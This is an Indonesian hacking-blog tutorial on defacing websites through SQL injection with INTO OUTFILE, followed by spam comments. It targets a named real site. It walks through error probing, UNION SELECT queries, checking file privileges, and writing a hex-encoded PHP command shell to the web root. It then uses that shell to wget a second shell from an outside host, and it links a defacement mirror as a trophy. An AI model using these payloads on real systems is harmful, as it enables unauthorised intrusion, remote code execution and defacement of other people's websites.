Cara Deface SQL-Injection Into Outfile
August 14, 2019
8 Comments
yo whatsap gaes, btw Assalamu'alaikum.. :)
kenalin nama gw Umam paling ganteng di Ghost Riddiculous Team. Kali ini gw mo berbagi ilmu, cara deface SQL-Injection Into Outfile - Upload shell without admin panel.
langsung aja ga usah basa basi h3h3
persiapan:
1. Internet lah pastinya
2. Target gan, klo ga ada target mo ngapain? :v
3. Kopi + Asap 😎
life target : http://bernadyland.com
step satu byasalah ya cari error nya dulu dengan quote ' klo error brrti ya vuln. Lakukan order by 1000 --+- sprti gambar dibawah
disitu muncul error kek gini..
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in D:\xampp\htdocs\bernadyland\berita\lihatDetailBerita.php on line 4
nah, step kedua lakukan union select pada umumna lah.. klo uda nampilin angka togelna sprti gambar dibawah ini..
kyta lgs cek file_privnya saja gan, contoh;
http://target.com/index.php?id=-7 union select 1,2,file_priv,3,4 from mysql.user-- -
klo muncul huruf Y kek gambar dibawah, brrti writable / bisa di into outfile. Klo engga? yaa gimana ya, bukan siapa" sih. Yaudah sih.. ;)
disini gw milih angka 4, knapa? karna aku sayang kamu h3h3 :)
nahkan muncul huruf Y, ini saaatnya kyta into outfile. Gimana mas caranya? gini slur, contoh;
http://target.com/index.php?id=-7 union select 1,2,<?php if(isset($_GET['grt'])){ echo system($_GET['grt']); }? >,4,5 into outfile '/home/user/public_html/tes.php'-- -
kode phpnya di hexa dulu slur, mo pake kode itu apa uploader lgs terserah, yg penting di hexa, gini jadina.
http://target.com/index.php?id=-7 union select 1,2,0x3c3f70687020696628697373657428245f4745545b27677274275d29297b206563686f2073797374656d28245f4745545b27677274275d293b207d3f203e,3,4 into outfile 'D:/xampp/htdocs/bernadyland/berita/test.php'-- -
D:/xampp/htdocs/bernadyland/berita/filemu.php
ini environ yg di dapatkan dari gambar error diatas.
klo udah tinggal akses shell cmdna
http://target.com/berita/filemu.php
disini kyta mainan rce, klo ga bisa di rce ya uploader lgs aja kode yg hexa tadi.
cara rce na gini
http://target.com/berita/filemu.php?grt=wget http://linkshell.com/shell.txt -O shell.php
tinggal akses lagi http://target.com/berita/shell.php
web yg di ss tadi:v
http://bernadyland.com/pwn.php
mirror : http://www.zone-h.org/mirror/id/32745069
oke mau lu apain bebas :)
btw nitip nick Umam 1337
Thanks for all member Ghost Riddiculous Team
Mohon maap jika ada kekurangan kata.
Messy fuel injectors can't convey the right splash design that is fundamental for spotless, effective burning. best fuel system cleaner
ReplyDeleteI can set up my new idea from this post. It gives in depth information. Thanks for this valuable information for all,.. two shot injection moulding
ReplyDeleteI really like your blog. Great article. It's most evident, people should learn before they are able to https://serverbrowse.com/
ReplyDeleteI am really enjoying reading your well written articles. It looks like you spend a lot of effort and time on your blog. I have bookmarked it and I am looking forward to reading new articles. Keep up the good work. lifestyle sports
ReplyDeleteThe next time I read a blog, I hope that it doesnt disappoint me as much as this one. I mean, I know it was my choice to read, but I actually thought you have something interesting to say. All I hear is a bunch of whining about something that you could fix if you werent too busy looking for attention. Albert Einstein
ReplyDeleteReally appreciate this wonderful post that you have provided for us.Great site and a great topic as well i really get amazed to read this. Its really good. Albert Einstein
ReplyDeletegalaucrew.tech
ReplyDeleteᐈ Casino Site to Start Betting at 2021 - LuckyClub
ReplyDeleteLuckyClub, a leading betting exchange, luckyclub is one of the most popular and most trusted online bookmakers. Bet on all your favourite sports and games from